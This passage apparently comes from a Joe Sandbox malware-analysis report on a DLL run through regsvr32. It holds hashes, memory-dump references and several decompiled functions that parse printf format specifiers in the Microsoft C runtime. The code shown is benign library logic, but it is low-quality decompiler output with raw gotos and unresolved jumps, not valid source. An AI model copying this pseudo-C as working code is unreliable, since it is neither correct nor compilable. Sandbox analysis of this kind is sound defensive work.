                                    0x7fef9d3df39
                                    0x7fef9d3df49
                                    0x7fef9d3df59
                                    0x7fef9d3df5b
                                    0x7fef9d3df5d
                                    0x7fef9d3df68
                                    0x7fef9d3df6d
                                    0x7fef9d3df76
                                    0x7fef9d3df7a
                                    0x7fef9d3df80
                                    0x7fef9d3df95
                                    0x7fef9d3dfa6
                                    0x7fef9d3dfb5
                                    0x7fef9d3dfdc

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                    • API String ID: 530996419-4206863317
                                    • Opcode ID: 7c5d23002966610aaf37fd2e87aab718b594dfcb558d5e32631a425086473698
                                    • Instruction ID: 3115a511369859e1f947b9f2c3204b19b7531d4cbd05c4b67493ff7b1ab56a73
                                    • Opcode Fuzzy Hash: 7c5d23002966610aaf37fd2e87aab718b594dfcb558d5e32631a425086473698
                                    • Instruction Fuzzy Hash: 5C910C62A0C6C18AE7F08B55E88077EB3E1F385756F600025E6CD87AA8DB7ED855DF10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3BCFA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 111COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 27%
                                    			E000007FE7FEF9D3BCFA(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t171;
				char* _t191;
				char* _t192;

				_a968 = _a696 & 0x000000ff;
				if (_a968 == 0x20) goto 0xf9d3bd57;
				if (_a968 == 0x23) goto 0xf9d3bd64;
				if (_a968 == 0x2b) goto 0xf9d3bd4a;
				if (_a968 == 0x2d) goto 0xf9d3bd3d;
				if (_a968 == 0x30) goto 0xf9d3bd72;
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000004;
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000001;
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000002;
				goto 0xf9d3bd7d;
				asm("bts eax, 0x7");
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000008;
				if (_a696 != 0x2a) goto 0xf9d3bdbe;
				_t191 =  &_a1112;
				_a88 = E000007FE7FEF9D31E40(_t191);
				if (_a88 >= 0) goto 0xf9d3bdbc;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3bdd5;
				_a88 = _t171 + _t191 - 0x30;
				_a116 = 0;
				if (_a696 != 0x2a) goto 0xf9d3be16;
				_t192 =  &_a1112;
				_a116 = E000007FE7FEF9D31E40(_t192);
				if (_a116 >= 0) goto 0xf9d3be14;
				_a116 = 0xffffffff;
				goto 0xf9d3be2d;
				_a116 = _t171 + _t192 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0xf9d3beb7;
				if (_a972 == 0x68) goto 0xf9d3bfc0;
				if (_a972 == 0x6c) goto 0xf9d3be76;
				if (_a972 == 0x77) goto 0xf9d3bfcd;
				goto 0xf9d3bfd9;
				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0xf9d3beb2;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
				goto 0xf9d3bfbe;
				_a704 = 0;
				goto E000007FE7FEF9D3BB66;
				goto 0xf9d3bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}






                                    0x7fef9d3bd02
                                    0x7fef9d3bd11
                                    0x7fef9d3bd1b
                                    0x7fef9d3bd25
                                    0x7fef9d3bd2f
                                    0x7fef9d3bd39
                                    0x7fef9d3bd3b
                                    0x7fef9d3bd44
                                    0x7fef9d3bd48
                                    0x7fef9d3bd51
                                    0x7fef9d3bd55
                                    0x7fef9d3bd5e
                                    0x7fef9d3bd62
                                    0x7fef9d3bd68
                                    0x7fef9d3bd70
                                    0x7fef9d3bd79
                                    0x7fef9d3bd8d
                                    0x7fef9d3bd8f
                                    0x7fef9d3bd9c
                                    0x7fef9d3bda5
                                    0x7fef9d3bdae
                                    0x7fef9d3bdb8
                                    0x7fef9d3bdbc
                                    0x7fef9d3bdd1
                                    0x7fef9d3bdda
                                    0x7fef9d3bdf2
                                    0x7fef9d3bdf4
                                    0x7fef9d3be01
                                    0x7fef9d3be0a
                                    0x7fef9d3be0c
                                    0x7fef9d3be14
                                    0x7fef9d3be29
                                    0x7fef9d3be3a
                                    0x7fef9d3be49
                                    0x7fef9d3be53
                                    0x7fef9d3be61
                                    0x7fef9d3be6b
                                    0x7fef9d3be71
                                    0x7fef9d3be84
                                    0x7fef9d3be91
                                    0x7fef9d3be9d
                                    0x7fef9d3bea5
                                    0x7fef9d3beae
                                    0x7fef9d3beb2
                                    0x7fef9d3bebb
                                    0x7fef9d3bed1
                                    0x7fef9d3bee2
                                    0x7fef9d3bef0
                                    0x7fef9d3befc
                                    0x7fef9d3bf04
                                    0x7fef9d3bf17
                                    0x7fef9d3bf28
                                    0x7fef9d3bf36
                                    0x7fef9d3bf42
                                    0x7fef9d3bf4a
                                    0x7fef9d3bf5a
                                    0x7fef9d3bf6a
                                    0x7fef9d3bf7a
                                    0x7fef9d3bf8a
                                    0x7fef9d3bf9a
                                    0x7fef9d3bfaa
                                    0x7fef9d3bfac
                                    0x7fef9d3bfae
                                    0x7fef9d3bfb9
                                    0x7fef9d3bfbe
                                    0x7fef9d3bfc7
                                    0x7fef9d3bfcb
                                    0x7fef9d3bfd1
                                    0x7fef9d3bfe6
                                    0x7fef9d3bff7
                                    0x7fef9d3c006
                                    0x7fef9d3c02d

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$0$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 530996419-4087627031
                                    • Opcode ID: 1de43203eafd45e9ce0d0d64285ee361cc766a04d488c37d7d0694f7340f7322
                                    • Instruction ID: 3ab598f7b4fd695a8a70feaac4248e5f119f303646eea4bd5d4eba80b196619f
                                    • Opcode Fuzzy Hash: 1de43203eafd45e9ce0d0d64285ee361cc766a04d488c37d7d0694f7340f7322
                                    • Instruction Fuzzy Hash: F3514C72A0D6C28AF3F19B64E855BBEBBE4F381345F200126D2D9869A9D77DE540CF10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3DCA8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 111COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 27%
                                    			E000007FE7FEF9D3DCA8(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t171;
				char* _t191;
				char* _t192;

				_a1404 = _a1208 & 0x0000ffff;
				if (_a1404 == 0x20) goto 0xf9d3dd05;
				if (_a1404 == 0x23) goto 0xf9d3dd12;
				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
				if (_a1404 == 0x2d) goto 0xf9d3dceb;
				if (_a1404 == 0x30) goto 0xf9d3dd20;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000004;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000001;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000002;
				goto 0xf9d3dd2b;
				asm("bts eax, 0x7");
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000008;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
				_t191 =  &_a1560;
				_a88 = E000007FE7FEF9D31E40(_t191);
				if (_a88 >= 0) goto 0xf9d3dd6a;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3dd83;
				_a88 = _t171 + _t191 - 0x30;
				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
				_t192 =  &_a1560;
				_a116 = E000007FE7FEF9D31E40(_t192);
				if (_a116 >= 0) goto 0xf9d3ddc2;
				_a116 = 0xffffffff;
				goto 0xf9d3dddb;
				_a116 = _t171 + _t192 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}






                                    0x7fef9d3dcb0
                                    0x7fef9d3dcbf
                                    0x7fef9d3dcc9
                                    0x7fef9d3dcd3
                                    0x7fef9d3dcdd
                                    0x7fef9d3dce7
                                    0x7fef9d3dce9
                                    0x7fef9d3dcf2
                                    0x7fef9d3dcf6
                                    0x7fef9d3dcff
                                    0x7fef9d3dd03
                                    0x7fef9d3dd0c
                                    0x7fef9d3dd10
                                    0x7fef9d3dd16
                                    0x7fef9d3dd1e
                                    0x7fef9d3dd27
                                    0x7fef9d3dd3b
                                    0x7fef9d3dd3d
                                    0x7fef9d3dd4a
                                    0x7fef9d3dd53
                                    0x7fef9d3dd5c
                                    0x7fef9d3dd66
                                    0x7fef9d3dd6a
                                    0x7fef9d3dd7f
                                    0x7fef9d3dd88
                                    0x7fef9d3dda0
                                    0x7fef9d3dda2
                                    0x7fef9d3ddaf
                                    0x7fef9d3ddb8
                                    0x7fef9d3ddba
                                    0x7fef9d3ddc2
                                    0x7fef9d3ddd7
                                    0x7fef9d3dde8
                                    0x7fef9d3ddf7
                                    0x7fef9d3de01
                                    0x7fef9d3de0f
                                    0x7fef9d3de19
                                    0x7fef9d3de1f
                                    0x7fef9d3de32
                                    0x7fef9d3de40
                                    0x7fef9d3de4c
                                    0x7fef9d3de54
                                    0x7fef9d3de5d
                                    0x7fef9d3de61
                                    0x7fef9d3de6a
                                    0x7fef9d3de80
                                    0x7fef9d3de91
                                    0x7fef9d3de9f
                                    0x7fef9d3deab
                                    0x7fef9d3deb3
                                    0x7fef9d3dec6
                                    0x7fef9d3ded7
                                    0x7fef9d3dee5
                                    0x7fef9d3def1
                                    0x7fef9d3def9
                                    0x7fef9d3df09
                                    0x7fef9d3df19
                                    0x7fef9d3df29
                                    0x7fef9d3df39
                                    0x7fef9d3df49
                                    0x7fef9d3df59
                                    0x7fef9d3df5b
                                    0x7fef9d3df5d
                                    0x7fef9d3df68
                                    0x7fef9d3df6d
                                    0x7fef9d3df76
                                    0x7fef9d3df7a
                                    0x7fef9d3df80
                                    0x7fef9d3df95
                                    0x7fef9d3dfa6
                                    0x7fef9d3dfb5
                                    0x7fef9d3dfdc

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$0$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 530996419-1247675978
                                    • Opcode ID: f21bac4cf66fd83060826b10cda673f64da0b58cdc9b26c9e440e84a16dbb144
                                    • Instruction ID: f27db2fcef6f8d513c01393a57896d629d62aa2ad95cdf3e250bd1829576e434
                                    • Opcode Fuzzy Hash: f21bac4cf66fd83060826b10cda673f64da0b58cdc9b26c9e440e84a16dbb144
                                    • Instruction Fuzzy Hash: FA510CB2A0C6C28AE7B09B64E8407BEB7E0F385346F600125D6CA869A8D77DE444DF10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3BD82 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 99COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 26%
                                    			E000007FE7FEF9D3BD82(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t139;
				char* _t159;
				char* _t160;

				if (_a696 != 0x2a) goto 0xf9d3bdbe;
				_t159 =  &_a1112;
				_a88 = E000007FE7FEF9D31E40(_t159);
				if (_a88 >= 0) goto 0xf9d3bdbc;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3bdd5;
				_a88 = _t139 + _t159 - 0x30;
				_a116 = 0;
				if (_a696 != 0x2a) goto 0xf9d3be16;
				_t160 =  &_a1112;
				_a116 = E000007FE7FEF9D31E40(_t160);
				if (_a116 >= 0) goto 0xf9d3be14;
				_a116 = 0xffffffff;
				goto 0xf9d3be2d;
				_a116 = _t139 + _t160 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0xf9d3beb7;
				if (_a972 == 0x68) goto 0xf9d3bfc0;
				if (_a972 == 0x6c) goto 0xf9d3be76;
				if (_a972 == 0x77) goto 0xf9d3bfcd;
				goto 0xf9d3bfd9;
				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0xf9d3beb2;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
				goto 0xf9d3bfbe;
				_a704 = 0;
				goto E000007FE7FEF9D3BB66;
				goto 0xf9d3bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}






                                    0x7fef9d3bd8d
                                    0x7fef9d3bd8f
                                    0x7fef9d3bd9c
                                    0x7fef9d3bda5
                                    0x7fef9d3bdae
                                    0x7fef9d3bdb8
                                    0x7fef9d3bdbc
                                    0x7fef9d3bdd1
                                    0x7fef9d3bdda
                                    0x7fef9d3bdf2
                                    0x7fef9d3bdf4
                                    0x7fef9d3be01
                                    0x7fef9d3be0a
                                    0x7fef9d3be0c
                                    0x7fef9d3be14
                                    0x7fef9d3be29
                                    0x7fef9d3be3a
                                    0x7fef9d3be49
                                    0x7fef9d3be53
                                    0x7fef9d3be61
                                    0x7fef9d3be6b
                                    0x7fef9d3be71
                                    0x7fef9d3be84
                                    0x7fef9d3be91
                                    0x7fef9d3be9d
                                    0x7fef9d3bea5
                                    0x7fef9d3beae
                                    0x7fef9d3beb2
                                    0x7fef9d3bebb
                                    0x7fef9d3bed1
                                    0x7fef9d3bee2
                                    0x7fef9d3bef0
                                    0x7fef9d3befc
                                    0x7fef9d3bf04
                                    0x7fef9d3bf17
                                    0x7fef9d3bf28
                                    0x7fef9d3bf36
                                    0x7fef9d3bf42
                                    0x7fef9d3bf4a
                                    0x7fef9d3bf5a
                                    0x7fef9d3bf6a
                                    0x7fef9d3bf7a
                                    0x7fef9d3bf8a
                                    0x7fef9d3bf9a
                                    0x7fef9d3bfaa
                                    0x7fef9d3bfac
                                    0x7fef9d3bfae
                                    0x7fef9d3bfb9
                                    0x7fef9d3bfbe
                                    0x7fef9d3bfc7
                                    0x7fef9d3bfcb
                                    0x7fef9d3bfd1
                                    0x7fef9d3bfe6
                                    0x7fef9d3bff7
                                    0x7fef9d3c006
                                    0x7fef9d3c02d

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                    • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2576288505-192189897
                                    • Opcode ID: 642eb86adef82c061240f963ecada7643a5a14508ef6930c6b5b5b901d4a1b0a
                                    • Instruction ID: e5e15c00c08c12f84a3dc3260eb1d354ac6b745d6778a8e2653f024642a32d0f
                                    • Opcode Fuzzy Hash: 642eb86adef82c061240f963ecada7643a5a14508ef6930c6b5b5b901d4a1b0a
                                    • Instruction Fuzzy Hash: 0D515E72A0D6C28AE7F0DB24E8947BEBBE4E384355F600126D2CD869A9DB7DD541CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3DD30 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 99COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 26%
                                    			E000007FE7FEF9D3DD30(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t139;
				char* _t159;
				char* _t160;

				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
				_t159 =  &_a1560;
				_a88 = E000007FE7FEF9D31E40(_t159);
				if (_a88 >= 0) goto 0xf9d3dd6a;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3dd83;
				_a88 = _t139 + _t159 - 0x30;
				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
				_t160 =  &_a1560;
				_a116 = E000007FE7FEF9D31E40(_t160);
				if (_a116 >= 0) goto 0xf9d3ddc2;
				_a116 = 0xffffffff;
				goto 0xf9d3dddb;
				_a116 = _t139 + _t160 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}






                                    0x7fef9d3dd3b
                                    0x7fef9d3dd3d
                                    0x7fef9d3dd4a
                                    0x7fef9d3dd53
                                    0x7fef9d3dd5c
                                    0x7fef9d3dd66
                                    0x7fef9d3dd6a
                                    0x7fef9d3dd7f
                                    0x7fef9d3dd88
                                    0x7fef9d3dda0
                                    0x7fef9d3dda2
                                    0x7fef9d3ddaf
                                    0x7fef9d3ddb8
                                    0x7fef9d3ddba
                                    0x7fef9d3ddc2
                                    0x7fef9d3ddd7
                                    0x7fef9d3dde8
                                    0x7fef9d3ddf7
                                    0x7fef9d3de01
                                    0x7fef9d3de0f
                                    0x7fef9d3de19
                                    0x7fef9d3de1f
                                    0x7fef9d3de32
                                    0x7fef9d3de40
                                    0x7fef9d3de4c
                                    0x7fef9d3de54
                                    0x7fef9d3de5d
                                    0x7fef9d3de61
                                    0x7fef9d3de6a
                                    0x7fef9d3de80
                                    0x7fef9d3de91
                                    0x7fef9d3de9f
                                    0x7fef9d3deab
                                    0x7fef9d3deb3
                                    0x7fef9d3dec6
                                    0x7fef9d3ded7
                                    0x7fef9d3dee5
                                    0x7fef9d3def1
                                    0x7fef9d3def9
                                    0x7fef9d3df09
                                    0x7fef9d3df19
                                    0x7fef9d3df29
                                    0x7fef9d3df39
                                    0x7fef9d3df49
                                    0x7fef9d3df59
                                    0x7fef9d3df5b
                                    0x7fef9d3df5d
                                    0x7fef9d3df68
                                    0x7fef9d3df6d
                                    0x7fef9d3df76
                                    0x7fef9d3df7a
                                    0x7fef9d3df80
                                    0x7fef9d3df95
                                    0x7fef9d3dfa6
                                    0x7fef9d3dfb5
                                    0x7fef9d3dfdc

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2576288505-734865713
                                    • Opcode ID: 84afe223306fb715127401468d722999f495e1b64e531eed53167a130bda57e2
                                    • Instruction ID: 8bcff37972761654e6234074656759b20f0543a56075d35ebc75ec1029b84271
                                    • Opcode Fuzzy Hash: 84afe223306fb715127401468d722999f495e1b64e531eed53167a130bda57e2
                                    • Instruction Fuzzy Hash: 0451FCB2A0C6C28AE7B09B64E8407BEB7E4F394346F600125E6C9879A9D77DD445CF14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3BDE7 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 24%
                                    			E000007FE7FEF9D3BDE7(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t113;
				char* _t133;

				if (_a696 != 0x2a) goto 0xf9d3be16;
				_t133 =  &_a1112;
				_a116 = E000007FE7FEF9D31E40(_t133);
				if (_a116 >= 0) goto 0xf9d3be14;
				_a116 = 0xffffffff;
				goto 0xf9d3be2d;
				_a116 = _t113 + _t133 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0xf9d3beb7;
				if (_a972 == 0x68) goto 0xf9d3bfc0;
				if (_a972 == 0x6c) goto 0xf9d3be76;
				if (_a972 == 0x77) goto 0xf9d3bfcd;
				goto 0xf9d3bfd9;
				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0xf9d3beb2;
